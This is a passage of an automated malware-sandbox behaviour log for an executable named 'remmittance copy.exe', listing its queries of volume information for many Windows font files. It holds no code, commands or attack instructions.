                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
